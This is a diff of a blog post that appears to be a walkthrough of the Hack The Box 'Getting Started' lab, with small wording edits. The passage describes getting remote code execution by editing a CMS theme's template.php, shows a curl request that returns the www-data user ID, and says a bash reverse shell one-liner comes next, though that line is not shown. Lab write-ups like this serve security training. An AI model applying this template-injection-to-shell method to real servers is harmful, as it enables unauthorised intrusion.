rubenhortas/rubenhortas.github.io/_posts/2023-07-05-htb-getting-started-walkthrough.md

 ![PHP code execution test](htb-getting-started-php-code-execution-test.png) *PHP code execution test*

-We save changes and We can curl this file (`http://gettingstarted.htb/theme/Innovation/template.php`), or browse it, and we see that we have a RCE (remote code execution).
+We save changes and we can curl this file (`http://gettingstarted.htb/theme/Innovation/template.php`), or browse it, and we see that we have a RCE (remote code execution).

 ```
 $ curl http://gettingstarted.htb/theme/Innovation/template.php
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 ```

-We have a RCE (remote code execution) and we need to take advantage of this RCE (remote code execution) to convert it in a remote shell.
+Now we have a RCE (remote code execution) and we need to take advantage of this RCE (remote code execution) to convert it in a remote shell.

 We will edit again the `template.php` file.
 But, this time, we will append the following bash one-liner reverse shell to the beginning: